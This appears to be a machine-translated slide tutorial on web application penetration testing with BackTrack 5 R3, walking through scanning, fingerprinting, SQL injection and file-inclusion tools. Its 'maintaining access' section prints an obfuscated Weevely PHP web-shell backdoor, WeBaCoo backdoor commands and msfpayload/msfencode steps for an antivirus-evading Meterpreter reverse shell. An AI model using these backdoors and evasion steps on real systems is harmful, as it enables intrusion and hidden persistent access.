3. INTRODUCTIONToday, as many of us (Pen-testers) we know that in these times the Analysis of Web Applications play a veryimportant role in making a Safety Evaluation and / or Penetration Testing, as this gives us the appropriateinformation about web Application, such as the type of plugin you use, either types of Joomla CMS -WordPress or other.This will help us to determine what we should use Exploit, or see exactly how to exploit the vulnerabilitiesthat can occur when performing penetration testing.Penetration Testing tests are also used to determine the level of security: a computer, a computer networkLAN (Local Area Network) or WLAN (Wireless Local Area Network), among other Web applications, usingidentical simulated computer attacks those who conduct a Black Hat Hacker, or Cracker but withoutcompromising the information or the availability of services, this is done in order to identify the potentialthreats in iT systems before the attacker discovers a (external or internal ). This process is also known asEthical Hacking (Ethical Hacking).To perform this procedure Penetration Testing, BackTrack 5 R3 is used, a Linux distro based on Ubuntuperfectly made to carry out these tests, as it comes with a set of very important tools that do much to get allthe necessary information about web applications, among others.BackTrack Wiki:http://www.backtrack-linux.org/wiki/Descarga:http://www.backtrack-linux.org/downloads/
4. METHODS OF ANALYSIS OF WEB APPLICATIONS:1. NETWORK MAPPING: Network Mapping is the study of the physical network connectivity. Mapping Internet is the study of the physical connectivity of the Internet. Network Mapping is often determine the servers and operating systems running on the network. The law and ethics of port scans are complex. An analysis of the network can be detected by humans or automated systems, and is treated as a malicious act. In the BackTrack suite includes NMAP, a tool that we all know for its power and effectiveness in performing their work, which is very useful to us to carry out this method so important in a Web Audit. • NMAP: Nmap ("Network Mapper") is an open source tool for network exploration and security auditing. Nmap uses IP packets "raw" ("raw", NT) in original ways to determine what hosts are available on a network, what services (name and version of the application) offering, what operating systems (and their versions) running, what type of packet filters or firewalls are in use, and dozens of other characteristics. Use: nmap www.sitio-web.com nmap 192.168.1.1
5. • NETIFERA: Netifera is a network scanner can scan passive (analyzing a pcap file, network sniffing lives) and assets of analysis (analysis of port entity). Identifies the network hosts. This project offers many advantages for security developers and researchers who want to implement new tools as well as the community of users of these tools. This tool is included in BackTrack and is located at the following address: Applications - BackTrack - Information Gathering - Network Analysis - Identify Live Hosts – Netifera The usage is very easy, just have to put the web address where it says: ... Type Address enter pressed and we will come out with the target websites and IPs to which will audit.: In this case I placed the website: www.paypal.com in which I made Reverse lookup, TCP Connect Scan UDP Scan, Crawler, NS Lookup, Brute Force Host Name
6. 2. INFORMATION GATHERING The first phase of safety assessment focuses on gathering information as much as possible about a web application. Gathering information is the most critical step of a test web application security. This task can be accomplished in many different ways, using public tools (search engine) scanner, simple sending HTTP requests or requests specially designed, it is possible to apply force to the filter information, for example, the disclosure error message or versions and technologies used. There are basically two types of data collection: active and passive. Passive information gathering is that attackers will not communicate directly with the target and are trying to gather information that is available on the Internet, while in the active collection of information, the attacker will be in direct contact with the object and will be trying to gather information. • THEHARVESTER: The Harvester is a tool to collect email accounts, user names and host names or sub domains from different public sources such as search engines and PGP key servers. Use: /pentest/enumeration/theharvester# ./theHarvester.py -d sitio-web.com -l 500 -b google /pentest/enumeration/theharvester# ./theHarvester.py -d sitio-web.com -b pgp /pentest/enumeration/theharvester# ./theHarvester.py -d sitio-web.com -l 200 -b linkedin • MALTEGO: Maltego is a tool that is based on the application information and forensic and shows how information is connected to each other. With Maltego, we can find relationships that people mostly use today, including your social profile (Facebook - Twitter), mutual friends, businesses that relate to the information gathered, and websites. If we collect information regarding any infrastructure, we can gather relationship between domains and DNS names. Location: Applications - Backtrack - Information Gathering - Network Analysis - DNS Analysis – Maltego
7. ARCHITECTURE OF MALTEGO EXAMPLE
8. 3. CMS IDENTIFICATION • BLINDELEPHANT: BlindElephant is a python based tool that is used for Web Application Fingerprinting. The tool is quick, has low bandwidth and is highly automated. Use /pentest/web/blindelephant/src/blindelephant# ./BlindElephant.py http://sitio-web.com/ cms • CMS-EXPLORER: Fingerprinting serves for web applications, can also be used to identify the type of CMS used, therefore, the attack is done according to the obtained information. Use: /pentest/enumeration/web/cms-explorer# ./cms-explorer.pl -url http://sitio-web.com/ -type cms
10. 5. OPEN SOURCE ANALYSIS Open-Source Analysis is performed using tools like GHDB, revhosts and XSSed. The GHDB (Google Hack Data Base) and XSSed are linked to websites, while rev hosts is a console tool. • GHDB: Google Hacking Database, the exploit-db team maintains a database for Google Dorks that can greatly help in Pen-testers information gathering. We can use the dorks to find certain types of vulnerable servers or other information. For example, a Google dork like "Microsoft-IIS/6.0" intitle: index.of "can be used to detect servers running on Microsoft IIS 6.0. • XSSED: http://www.xssed.com/ a website that contains a list of websites vulnerable to Cross Site Scripting (XSS), by various authors. It can be opened from: Applications - Backtrack - Information Gathering - Web Application Analysis - Open Source Analysis - Xssed.6. WEB CRAWLERS In this last category of Web Analysis, famous Crawlers are used, this will help much to list the files and folders "hidden" inside a web server. The BackTrack suite has many tools to perform this type of analysis such as the DIRB, Golismero, SQLScan, Deblaze and WebShag. • WEBSHAG: Webshag is a tool programmed in Python, which combines the features useful for Auditing Web Servers as web crawling, URL scanning or file fuzzing. Webshag can be used to analyze a web server in HTTP or HTTPS, through a proxy and using HTTP authentication (Basic and Digest).
11. Besides innovative features proposed IDS evasion, intended that the correlation between the application more complicated (for example, using a random sample for each proxy server HTTP request). It can be opened from Applications - BackTrack - Information Gathering - Web Application Analysis - Web Crawlers - WebShag Gui.• DIRBUSTER: DirBuster is a Java application designed to make Brute Force in the directories and files in web server / application. Often is the case now of what looks like a web server in a state of default installation is actually not, and has pages and applications hidden within it, then try to find these DirBuster. DirBuster is a total of 9 different lists, this makes DirBuster extremely effective in finding hidden files and directories. And if that was not enough DirBuster also has the option of making a pure Brute Force. It can be found at the following location: Applications - BackTrack - Vulnerabylity Assessment - Web Application Assessment - Web Application Fuzzers – DirBuster
12. 7. VULNERABILITY ASSESSMENT AND EXPLOITATION The stage of vulnerability assessment is where you can explore our goal for errors, but before a vulnerability assessment, gathering information about the target is much more useful. The information gathering phase remains the key step before further attacks, simply because it makes the job easier, for example, in the first stage in the use of scanners to identify the CMS as BlindElephant, was scanned and found the version of the installed application. Now, at the stage of vulnerability assessment, you can use many tools (scanners) that will help a lot to find vulnerabilities in respective specific web server. • JOOMSCAN: It is a Perl-based tool that is used to identify known vulnerabilities such as SQL Injection, XSS or other, on web servers based on the Joomla platform. • Detects the version of Joomla! is running. • Scan and locate known vulnerabilities in Joomla! and its extensions. • It reports in text or HTML format. • Allow immediate updating via a scanner or svn. • type Detects vulnerabilities: SQL injection, LFI, RFI, XSS and others. It can be opened from /pentest/web/joomscan# ./joomscan.pl -u www.sitio-web.com • SQLMAP: It is a tool that helps automate the process of detecting and exploiting SQL injection vulnerabilities allowing full access to the database of Web servers. It can be opened from /pentest/database/sqlmap# ./sqlmap.py -u http://www.sitio-web.com/ --dbs
13. • FIMAP: It is a small tool programmed in python which can find, prepare, audit and automatically exploiting Remote File Inclusion errors in web applications. Is currently under development, but it is usable. The objective is to improve the quality Fimap and security of your website. It can be opened from /pentest/web/fimap# ./fimap.py -u http://localhost/test.php?file=bang&id=23 /pentest/web/fimap# ./fimap.py -g -q noticias.php?id=
14. • SHODAN: This is another site evaluation tool, particular utility for pentesters. It can be used to collect a series of intelligent information about devices that are connected to the Internet. We can, for example, look to see if all network devices such as routers, VoIP, printers, cameras, etc., are in place. To find if a service is running in the domain, the syntax would be: • hostname: port target.com: 80,21,22 If we simply want to know the results on the host name, simply, the syntax would be: • hostname: target.com• W3AF: Audit is a tool for web applications security, is basically divided into several modules such as Attack, Audit, Exploit, Discovery, and Brute Force Evasion, which can all be used accordingly. These modules come with several modules w3af side, for example, we can select the module XSS Audit assuming it is necessary to perform a particular audit. It can be opened from Applications - BackTrack - Vulnerability Assessment - Web Application Assessment - Web Vulnerability Scanners - w3af
15. Once the analysis is complete, w3af shows detailed information about the vulnerabilities found in thespecified website, which can compromise accordingly for further exploitation.
16. • UNISCAN: A Web Vulnerability Scanner, led to computer security, aimed at finding vulnerabilities in web systems. It is licensed under GNU GENERAL PUBLIC LICENSE 3.0 (GPL 3). Uniscan is developed in Perl, has easy handling of regular expressions and is also multi-threaded. Features: • identification system pages via a web crawler. • Proof of pages found through the GET method. • Test the forms found by the POST method. • Support for SSL requests (HTTPS). • Supports Proxy. • Generate list of sites via Google. • Generate list of sites with Bing. • Client GUI written using perl tk. It can be downloaded from the following link: http://uniscan.sourceforge.net/?page_id=7 it can be opened from ./uniscan.pl -u http://www.sitio-web.com/ -qweds• NIKTO: It is a web server scanner which performs comprehensive tests against web servers for multiple items, including over 6500 files / CGIs potentially dangerous controls outdated versions of over 1250
17. servers, and version specific problems on over 270 servers. It also checks the server configuration elements, such as the presence of multiple index files and HTTP server options. Nikto is a robust project that has been several years in development and is constantly evolving. Some of the most interesting features of this tool include the ability to generate reports in various formats, integration with LibWhisker (Anti-IDS), integration with Metasploit, among others. it can be opened from Applications - BackTrack - Vulnerability Assessment - Web Application Assessment - Web Vulnerability Scanners - Nikto Use: /pentest/web/nikto# ./nikto.pl -host www.sitio-web.com8. MAITAINING ACCESS Once you access the website (goal), we need to maintain access for future use, because we will not be starting from scratch again and again. To avoid this, we can load the shell backdoorss web or the web page. The coding of the tailgate is also important, as not to create "noise" when loaded on the server. If so, then administrators can easily detect and remove the rear doors. In BackTrack 5 R3 suite incorporates good tools to carry out this process, which are: • WEEVELY: It is an essential tool for the further exploitation of web applications, and can be used as a back door or a web shell to manage web accounts. Weevely search functions like system (), passthru (), popen (), exec (), proc_open (), shell_exec (), pcntl_exec (), perl-> system (), python_eval ()) using activated functions in a server remote. The following code is an example of the code of the backdoor created by Weevely. -------------------------------------------------------------------------------------------------------------------
18. eval(base64_decode(cGFyc2Vfc3RyKCRfU0VSVkVSWydIVFRQX1JFRkVSRVInXSwk YSk7IGlmKHJlc2V0KCRhKT09J2luJyAmJiBjb3VudCgkYSk9PTkpIHsgZWNobyAnPGZv c2VjPic7ZXZhbChiYXNlNjRfZGVjb2RlKHN0cl9yZXBsYWNlKCIgIiwgIisiLCBqb2luK GFycmF5X3NsaWNlKCRhLGNvdW50KCRhKS0zKSkpKSk7ZWNobyAnPC9mb3NlYz4nO30=)); ------------------------------------------------------------------------------------------------------------------- It can be opened from Applications - BackTrack - Maintaining Access - Web BackDoors - Weevely Use: /pentest/backdoors/web/weevely# ./weevely.py generate password /root/back.php /pentest/backdoors/web/weevely# ./weevely.py http://www.sitio-web.com/back.php password• WEBACOO: WeBaCoo (Web Backdoor Cookie) is a backdoor that provides a terminal connection over HTTP between client and web server. It is an exploitation tool to maintain access to a web server (hacked). It was designed to operate under the radar of modern up-to-dated AV, NIDS, IPS, Network Firewalls and Application Firewalls, proving stealth mechanism to execute commands on the compromised server. File obfuscated performs communication via HTTP headers Cookie validating HTTP requests and responses from the web server. WeBaCoo provides a way to generate the code to create the PHP backdoor using predefined payloads. It also offers the "terminal" mode in which the user can establish a remote connection to the server and execute commands with privileges of the web service desired. The download is available from Github: https://github.com/anestisb/WeBaCoo Options: 1) Create obfuscated backdoor backdoor.php with default settings: •. / Webacoo.pl-g-o backdoor.php 2) Create raw-backdoor.php backdoor de-obfuscated using the work "transit": •. / webacoo.pl-g-o raw-backdoor.php-f 4-r 3) Set "terminal" connection to the remote host using the default settings: •. / webacoo.pl-t-u http://127.0. 0.1/backdoor.php 4) Set "terminal" connection to the remote host to configure some arguments: •. / webacoo.pl-t-u-c http://127.0.0.1/backdoor.php "Test-Cookie" - d "TTT"
19. 5) Set "terminal" connection to the remote host via HTTP proxy: •. / webacoo.pl-t-u-p 127.0.0.1:8080 http://10.0.1.13/backdoor.php 6 ) Set "terminal" connection to the remote host via HTTP proxy with basic authentication: •. / webacoo.pl-t-u-p http://10.0.1.13/backdoor.php user: password: 10.0.1.8: 3128 7) Set "terminal" connection to the remote host via Tor and record activity: •. / webacoo.pl-t-u-p http://example.com/backdoor.php tor-l webacoo_log.txt• MSFPAYLOAD: Metasploit can be used to create backdoors that can then be used to maintain access to the web server. This can be done with the help of msfpayload. The steps to create backdoor msfpayload are as follows: We have to select the Payload that we will use to get a Meterpreter shell generated through a reverse TCP connection. The command would be: msfpayload windows/meterpreter/reverse_tcp This Payload has two parameters: lhost (our IP) and LPORT to select the port that we will use. The "R" is used for the output file in RAW data format so that we can then encode. msfpayload windows/meterpreter/reverse_tcp LHOST=127.0.0.1 LPORT=1234 R This command will create the payload, but it has to be coded to avoid antivirus detection for that matter can be done using the msfencode option to do this, we need to use pipe ("|") windows/meterpreter/reverse_tcp LHOST=127.0.0.1 LPORT=1337 R| msfencode –e x86/shikata_ga_nai –t exe >> bucker.exe -e is used to specify the encoding necessary in this case Im using the encoding shikata_ga_nai and-t for the type of file extension (exe). For example, if we want to see the list of available encoders MSF, use the following command: msfpayload windows/meterpreter/reverse_tcp -l
20. 9. CONCLUSION These are only a few methods you can follow to make the exploitation of vulnerabilities in a web application. Once we have the information about our goal, try to perform a vulnerability assessment in order to obtain information about the exploits that can be used. Once done, exploit vulnerabilities and, if necessary, load a backdoor, but before that, you must encode the backdoor to avoid detection. I hope this will help you find the vulnerability, exploitation and how to maintain access to your target.My Greeting.References:http://en.wikipedia.org/wiki/Penetration_testhttp://www.giac.org/certification/web-application-penetration-tester-gwapthttp://www.offensive-security.com/information-security-training/penetration-testing-with-backtrack/https://www.owasp.org/index.php/Web_Application_Penetration_Testing